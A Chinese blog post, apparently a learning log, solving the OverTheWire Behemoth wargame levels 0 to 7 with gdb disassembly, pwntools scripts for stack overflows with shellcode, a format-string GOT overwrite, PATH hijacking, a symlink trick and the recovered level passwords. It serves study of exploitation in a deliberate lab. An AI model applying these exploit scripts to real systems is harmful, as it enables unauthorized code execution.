OverTheWire-Behemoth

最新推荐文章于 2024-09-28 22:34:31 发布
最新推荐文章于 2024-09-28 22:34:31 发布
阅读量2.7k 收藏
点赞数
分类专栏: 网络安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kang0x0/article/details/121810098
版权

文章目录

前言

本篇文章为OverTheWire网站Behemoth关卡的学习记录。

Level 0 -> Level 1

Username: behemoth0
Password: behemoth0
ssh behemoth0@behemoth.labs.overthewire.org 2221

  • behemoth0执行文件下载到自己搭建的虚拟机上进行调试分析。
  • 通过gdb调试,反汇编分析发现输入相应的password字符串,就可以得到密码。
pwndbg> disassemble main
Dump of assembler code for function main:
...
   0x08048619 <+104>:   lea    eax,[ebp-0x1c]
   0x0804861c <+107>:   push   eax
   0x0804861d <+108>:   lea    eax,[ebp-0x5d]
   0x08048620 <+111>:   push   eax
   0x08048621 <+112>:   call   0x80483f0 <strcmp@plt>
   0x08048626 <+117>:   add    esp,0x8
...
End of assembler dump.
pwndbg> b *0x08048621
Breakpoint 1 at 0x8048621
pwndbg> r
...
─────────[ DISASM ]────────────────────────────────────
 ► 0x8048621 <main+112>    call   strcmp@plt                     <strcmp@plt>
        s1: 0xffffd1eb ◂— 0x636261 /* 'abc' */
        s2: 0xffffd22c ◂— 'eatmyshorts'
  • 登录服务器执行程序。
behemoth0@behemoth:/behemoth$ ./behemoth0
Password: eatmyshorts
Access granted..
$ cat /etc/behemoth_pass/behemoth1
aesebootiv

Level 1 -> Level 2

Username: behemoth1
Password: aesebootiv
ssh behemoth1@behemoth.labs.overthewire.org 2221

  • gdb调试发现gets函数,存在缓冲区溢出。
  • 由ebp-0x43,知道ret的地址在0x43+4处。
pwndbg> disassemble main
Dump of assembler code for function main:
   0x0804844b <+0>:     push   ebp
   0x0804844c <+1>:     mov    ebp,esp
   0x0804844e <+3>:     sub    esp,0x44
   0x08048451 <+6>:     push   0x8048500
   0x08048456 <+11>:    call   0x8048300 <printf@plt>
   0x0804845b <+16>:    add    esp,0x4
   0x0804845e <+19>:    lea    eax,[ebp-0x43]
   0x08048461 <+22>:    push   eax
   0x08048462 <+23>:    call   0x8048310 <gets@plt>
   0x08048467 <+28>:    add    esp,0x4
   0x0804846a <+31>:    push   0x804850c
   0x0804846f <+36>:    call   0x8048320 <puts@plt>
   0x08048474 <+41>:    add    esp,0x4
   0x08048477 <+44>:    mov    eax,0x0
   0x0804847c <+49>:    leave  
   0x0804847d <+50>:    ret    
End of assembler dump.
  • 在gets函数处下断,获取eax的值,从而计算出返回地址。
# -*- coding: utf-8 -*-
from pwn import *

# print("A"*71+"B"*4)

shellcode = shellcraft.i386.sh()
# print(len(asm(shellcode)))

# ret_addr = 0xffffd1f5 + 71 + 100
ret_addr = 0xffffd655+ 71 + 100 #eax
payload = b"\x90" * 71
payload += p32(ret_addr)
payload += b"\x90" * 128
payload += asm(shellcode) # len 22

sys.stdout.buffer.write(payload) # > test.txt

# print(payload)
# (cat test ;cat) | ./behemoth1
  • 将test.txt上传至服务器上执行,得到shell。
behemoth1@behemoth:/behemoth$ (cat /tmp/mytest1/behemoth1.txt ;cat) | ./behemoth1
Password: Authentication failure.
Sorry.
whoami
behemoth2
cat /etc/behemoth_pass/behemoth2
eimahquuof

Level 2 -> Level 3

Username: behemoth2
Password: eimahquuof
ssh behemoth2@behemoth.labs.overthewire.org 2221

  • gdb调试发现程序执行system(“touch %d”),可通过改变PATH环境变量,使程序实现touch脚本文件。
  • 首先,创建自己的touch脚本,内容为cat /etc/behemoth_pass/behemoth3
  • 需要更新 PATH 变量,以便它首先查看当前工作目录,以确保执行的是我们的触摸脚本而不是实际的触摸程序。
behemoth2@behemoth:/tmp/mytest2$ cat touch
cat /etc/behemoth_pass/behemoth3
behemoth2@behemoth:/tmp/mytest2$ chmod 777 touch

behemoth2@behemoth:/tmp/mytest2$ export PATH=/tmp/mytest2:$PATH
behemoth2@behemoth:/tmp/mytest2$ /behemoth/behemoth2
nieteidiel

Level 3 -> Level 4

Username: behemoth3
Password: nieteidiel
ssh behemoth3@behemoth.labs.overthewire.org 2221

  • gdb调试发现,第二个printf函数存在格式化字符串漏洞,并且之后执行puts函数打印aaaand goodbye again.。(格式化字符串漏洞利用原理参考其他资料)
  • 可通过格式化字符串漏洞修改puts_got地址的值为system的虚拟地址;
  • 并在临时目录下创建aaaanb脚本,修改PATH变量,类似上一关。从而执行aaaanb脚本输出密码。
behemoth3@behemoth:/tmp/mytest3$ cat aaaand
cat /etc/behemoth_pass/behemoth4
behemoth3@behemoth:/tmp/mytest3$ chmod 777 aaaand

behemoth3@behemoth:/tmp/mytest3$ export PATH=/tmp/mytest3:$PATH

behemoth3@behemoth:/tmp/mytest3$ /behemoth/behemoth3 < test.txt
ietheishei
  • python脚本生成格式化字符串。
# -*- coding: utf-8 -*-
from pwn import *

offset = 1
puts_got = 0x080497ac
system_addr = 0xf7e4c850 # 0xf7e08160

payload = fmtstr_payload(offset, {puts_got : system_addr})

sys.stdout.buffer.write(payload) # > test.txt

# touch aaaand
# export PATH=/.../:$PATH
# readelf -r behemoth3 -> puts_got
# gdb print system -> system_addr

Level 4 -> Level 5

Username: behemoth4
Password: ietheishei
ssh behemoth4@behemoth.labs.overthewire.org 2221

  • 通过IDA反汇编分析程序执行过程,发现程序会获取自身pid,并在/tmp目录下打开相应文件,通过fgetc函数输入内容。
  • 进程pid生成规律为最大pid+1,通过ps aux,得到最大pid。
  • 通过ln -s 软链接方式链接到密码文件,从而输出密码。
  • 也可以通过脚本不断执行程序,使之进程pid循环匹配到自己创建的链接文件,参考其他资料实现。
behemoth4@behemoth:/behemoth$ ln -s /etc/behemoth_pass/behemoth5 /tmp/29305
behemoth4@behemoth:/behemoth$ ps aux
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
behemot+ 28976  0.0  0.5  21208  5140 pts/31   Ss   03:00   0:00 -bash
behemot+ 29305  0.0  0.2  19196  2436 pts/31   R+   03:11   0:00 ps aux
behemoth4@behemoth:/behemoth$ ln -s /etc/behemoth_pass/behemoth5 /tmp/29307
behemoth4@behemoth:/behemoth$ ./behemoth4
Finished sleeping, fgetcing
aizeeshing

Level 5 -> Level 6

Username: behemoth5
Password: aizeeshing
ssh behemoth5@behemoth.labs.overthewire.org 2221

  • 通过IDA反汇编分析程序执行流程,可以知道程序打开behemoth6的密码文件;
  • 通过socket函数创建套接字,类型为UDP;(可通过less /usr/include/bits/socket_type.h自动数值2为类型 SOCK_DGRAM = 2,即UDP)
  • 通向本地端口1337发送密码文件的内容。
  • 通过nc命令创建监听端口,并在另一个终端执行程序,即可获得密码。可参考资料Linux nc命令
  • 提示:通过ps aux命令可发现有以前执行的命令。
(gdb)
push    0               ; protocol
push    2               ; type
push    2               ; domain
call    _socket

behemoth5@behemoth:~$ less /usr/include/bits/socket_type.h
...
#define SOCK_STREAM SOCK_STREAM
  SOCK_DGRAM = 2,               /* Connectionless, unreliable datagrams
                                   of fixed maximum length.  */

behemoth5@behemoth:/behemoth$ nc -l -u -p 1337 localhost
mayiroeche

Level 6 -> Level 7

Username: behemoth6
Password: mayiroeche
ssh behemoth6@behemoth.labs.overthewire.org 2221

  • 通过IDA及gdb分析两个程序执行流程,可知道如下信息。
  • behemoth6程序通过popen函数执行behemoth6_reader,并将得到的结果与字符串“HelloKitty”进行比较,如果相等,则执行shell;
  • behemoth6_reader程序读取shellcode.txt文件到malloc申请的内存中,并直接call执行shellcod的数据。
  • 利用思路:编写shellcode,实现printf("HelloKitty");的函数调用过程,即可得到shell。
  • 首先编写初步的汇编,注意call printf处,还需要通过gdb调试获取malloc申请的地址,以及printf的虚拟地址,之后在计算对应硬编码的偏移值。
pwndbg> info registers 
eax            0x804c2f0           134529776
ecx            0x804b010           134524944
pwndbg> print printf
$1 = {int (const char *, ...)} 0xf7e17220 <__printf>
  • 汇编代码如下。
; nasm -f elf32 sc32.asm
; ld -m elf_i386 -o sc32 sc32.o
; objdump -d sc32
section .text
global _start
_start:
push 0x00007974;"ty\x00\x00"
push 0x74694B6F;"oKit"
push 0x6C6C6548;"Hell"
mov ebx, esp
push ebx
call 0xf7e17220 ;__printf ,need to calculate offset
add esp, 0x10
ret
  • 提取生成的shellcode硬编码。
kang@kali:~/PWN/Behemoth/Behemoth6$ objdump -d sc32 |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x68\x74\x79\x00\x00\x68\x6f\x4b\x69\x74\x68\x48\x65\x6c\x6c\x89\xe3\x53\xe8\x09\xe2\xdc\xef\x83\xc4\x10\xc3"
  • 将shellcode硬编码写到python脚本中。
  • 注意:此时需根据malloc申请的地址,以及运行时printf的虚拟地址,计算出printf函数的偏移值。基本的公式是:目的地址(printf虚拟地址) = 当前地址(call指令处的地址) + 当前指令长度(5) + 硬编码偏移值(求)
  • 注意:malloc申请的地址与call指令地址之间还有18字节的长度,需要减去。
# -*- coding: utf-8 -*-
from pwn import *

# printf_offset = 0xf7e17220 - 0x804c302 - 5
printf_offset = 0xf7e5b7d0 - 0x804c170 - 5 - 18 

payload = b"\x68\x74\x79\x00\x00"
payload += b"\x68\x6f\x4b\x69\x74"
payload += b"\x68\x48\x65\x6c\x6c"
payload += b"\x89\xe3"
payload += b"\x53"
# payload += b"\xe8\x09\xe2\xdc\xef"
payload += b"\xe8" + p32(printf_offset)
payload += b"\x83\xc4\x10"
payload += b"\xc3"

sys.stdout.buffer.write(payload) # > shellcode.txt
  • 将生成的shellcode.txt上传至临时目录,执行即可。
behemoth6@behemoth:/tmp/mytest6$ /behemoth/behemoth6_reader
HelloKittybehemoth6@behemoth:/tmp/mytest6$ /behemoth/behemoth6
Correct.
$ cat /etc/behemoth_pass/behemoth7
baquoxuafo

Level 7 -> Level 8

Username: behemoth7
Password: baquoxuafo
ssh behemoth7@behemoth.labs.overthewire.org 2221

  • 通过IDA和gdb分析程序执行流程,可以知道程序判断输入的前0x200个字符是否为字母,如果是,调用strcpy()函数复制数据到缓冲区中(存在缓冲区溢出);否则提示错误。
  • 这里可以输入0x200个字母字符,绕过判断,直到调用strcpy()函数。
  • ret_addr的地址值通过gdb调试x /200wx $esp得到。
  • python脚本如下。
from pwn import *
import sys

# ./behemoth7 aaaaaaaaaaaaaaaaaaaa > hex
ret_addr = 0xffffd448
# ret_addr = 0xffffd40c
shellcode = shellcraft.i386.sh()

# print(hex(blah_addr))
# print(shellcode)
# print(asm(shellcode))
# print(len(asm(shellcode)))

payload = b"A"*0x20C
payload += b"A"*4
payload += p32(ret_addr)
payload += b"\x90" * 200
payload += asm(shellcode)

# print(len(payload))
# print(payload)
sys.stdout.buffer.write(payload) # > test.txt

# r $(cat test.txt)
  • 将test.txt上传至服务器临时目录,执行即可。
behemoth7@behemoth:/tmp/mytest7$ /behemoth/behemoth7 $(cat test.txt)
$ cat /etc/behemoth_pass/behemoth8
pheewij7Ae

总结

  • 题目主要是简单的栈溢出、格式化字符串漏洞,以及IDA的使用。
kang0x0
关注
专栏目录
170903 WarGames-Behemoth(1)
whklhhhh的博客
09-05 319
1625-5 王子昂 总结《2017年9月3日》 【连续第335天总结】 A. WarGames-Behemoth B.Level 1int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[3]; // [sp+1Dh] [bp-43h]@1 printf("Password: ");
OverTheWire_bandit
04-07
OverTheWire_bandit
OverTheWire-Natas
kang0x0的博客
08-11 844
学习目标: 提示:这里可以添加学习目标 例如:一周掌握 Java 入门知识 学习内容: 提示:这里可以添加要学的内容 例如: 1、 搭建 Java 开发环境 2、 掌握 Java 基本语法 3、 掌握条件语句 4、 掌握循环语句 学习时间: 提示:这里可以添加计划学习的时间 例如: 1、 周一至周五晚上 7 点—晚上9点 2、 周六上午 9 点-上午 11 点 3、 周日下午 3 点-下午 6 点 学习产出: 提示:这里统计学习计划的总量 例如: 1、 技术笔记 2 遍 2、CSDN 技术博客 3 篇
OverTheWire-Bandit
kang0x0的博客
07-15 597
文章目录前言Level 0Level 1Level 2Level 3总结 前言 本篇文章为OverTheWire网站Bandit关卡的学习记录。 通过ssh登录服务器进入Level 0。 ssh bandit.labs.overthewire.org 2220 username:bandit0 password:bandit0 Level 0 提示密码存放在home目录下的readme文件上。 获取密码登录服务器进入Level1。 bandit0@bandit:~$ ls bandit0@ban
OverTheWire网站:OverTheWire网站
02-28
战争游戏 OverTheWire社区提供的战争游戏可以以充满乐趣的游戏形式帮助您学习和实践安全概念。 如果您有任何问题,疑问或建议,可以通过加入我们。 !!! 不要提出与游戏相关的问题。 该存储库仅用于网站!!! 贡献给这个网站 您可以克隆存储库,并通过发出拉取请求对网站进行更改。 为了验证您所做的编辑看起来是否应该看起来像应有的样子,您可以使用托管此网站的本地副本。 安装jekyll之后,请在与此README文件相同的目录中使用以下命令来启动本地Web服务器: jekyll serve
behemoth - 03
shuimuyq的专栏
02-23 451
#include int main(int argc, char *argv[]) { char buf[200]; printf("Identify yourself: "); fgets(buf, 200, stdin); printf("Welcome, "); printf(buf); puts("\naaaand goodbye again."); return
behemoth-commoncrawl:支持 Behemoth 中的旧(2013 年之前)CommonCrawl 数据集
06-11
behemoth-commoncrawl Behemoth 的 CommonCrawl 模块。 这是用于从旧的基于 ARC(2013 年之前)的 CommonCrawl 数据集进行转换。 对于基于 WARC 的新 CC 格式,请改用 IO 模块 [ ]。 注意:您需要拥有一个 AWS ...
behemoth-language-id-1.0.jar
03-15
官方版本,亲测可用
behemoth-uima-1.0.jar
03-15
官方版本,亲测可用
behemoth-tika-1.0.jar
03-15
官方版本,亲测可用
OverTheWire的bandit游戏1
John_lain的博客
10-16 1750
文章目录介绍题目bandit0bandit1bandit2bandit3bandit4bandit5bandit6bandit7bandit8bandit 9bandit 10bandit 11bandit 12bandit13bandit14bandit15 介绍 信息安全作为作为一个早睡晚起的学科(早上睡觉晚上起床),需要掌握海量的基础知识来支撑后期的学习.而兴趣是我们能坚持下去的动力.遇到了...
OVerTheWire:Banditt通关20-33(持续更新)
friutUncil的博客
09-24 1155
OVerTheWire:Banditt通关20-33(持续更新)@TOC Level20-21 ls 查看一下题目里的文件 nc -lv < /etc/bandit_pass/bandit20 & 使用nc 监听一个端口并显示细节,收到连接后把20关的密码发过去,后台运行 ./suconnext [port] 运行这个文件 后面带前面监听的端口号,它会发送下一关的密码过来 ...
web渗透测试在线网站
eli的博客
11-16 1748
国外 1、bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。 地址:http://www.itsecgames.com/ 2、Damn Vulnerable iOS App(DVIA) DVIA是一个iOS安全的应用。它的主要目标给移动安全爱好者学习iOS的渗透测试技巧提供一个合法的平台。APP涵盖了所有常见的iOS安全漏洞,它免费并...
想练习黑客技术的,这16个网站也许可以帮到你
代码讲故事
05-18 3079
俗话说得好,最好的防守就是进攻,而这句话同样适用于信息安全领域。接下来,我们将给大家介绍15个最新的网络安全网站。无论你是开发人员、安全专家、审计人员、或者是渗透测试人员,你都可以利用这些网站来提升你的黑客技术。熟能生巧,请你时刻牢记这一点! bWAPP bWAPP,即Buggy Web Application,这是一个免费开源的Web应用。该网站的开发者Malik Messelem(@MME_IT)在搭建这个站点时故意留下了大量的安全漏洞,其中还包含有OWASP Top10中的100多个常见安全问题。 b
OverTheWire的Bandit题
公众号shadow sock7
11-06 2138
题目: http://overthewire.org/wargames/bandit/bandit21.html Write-up: https://rundata.wordpress.com/2013/03/21/overthewire-bandit-wargame-solutions-1-24/ https://github.com/Cathon/mySolutions/blob/mas
探索光耦:隔离电压——光耦保障电路安全与性能的关键
forvevr的博客
09-25 682
在实际应用中,光耦的隔离电压应根据工作环境中的电压等级、电流负载和潜在的电压波动来选择。比如,对于高压电力设备,建议选择隔离电压较高的光耦,以应对突发的电压尖峰或电流浪涌。在现代电子设备和系统中,电气隔离是保障电路稳定运行和安全的重要环节,而光耦(光电耦合器)则是实现这种隔离的核心元件之一。具有较高隔离电压的光耦能在这些波动和干扰中,稳定地工作,确保系统运行的连续性和可靠性。光耦通过将不同电位的电路有效隔离,避免了跨电路间的电流回流对低压电路元件的损害,延长了设备的使用寿命。
【蚂蚁HR-注册/登录安全分析报告】
最新发布
09-28 580
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
【车联网安全】车端网络攻击及检测的框架/模型
#7的博客
09-24 1388
本文主要调研了车联网安全的一些攻击及检测的模型/框架,对国家标准进行了调研,并汇总上述调研内容。
The largest animal ever to have lived on Earth is the dinosaur Argentinesaurus, a hulking 70-ton的英文全文
04-03
The largest animal ever to have lived on Earth is the dinosaur Argentinosaurus, a hulking 70-ton behemoth that roamed the Earth during the Late Cretaceous period, approximately 90 million years ago. This massive dinosaur was around 100 feet long and stood as tall as a four-story building, making it one of the largest land animals in history. Argentinosaurus was a sauropod, a group of long-necked, herbivorous dinosaurs that were characterized by their massive size and distinctive body shape. These creatures had thick, columnar legs, long necks, and small heads, and were able to consume vast amounts of vegetation in order to fuel their massive bodies. Despite its impressive size, Argentinosaurus was not the longest dinosaur ever discovered. That title goes to the slightly smaller Seismosaurus, which was estimated to be around 150 feet long. However, Argentinosaurus remains the largest known land animal in terms of overall mass, and its discovery has shed new light on the incredible diversity of life that once existed on our planet.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值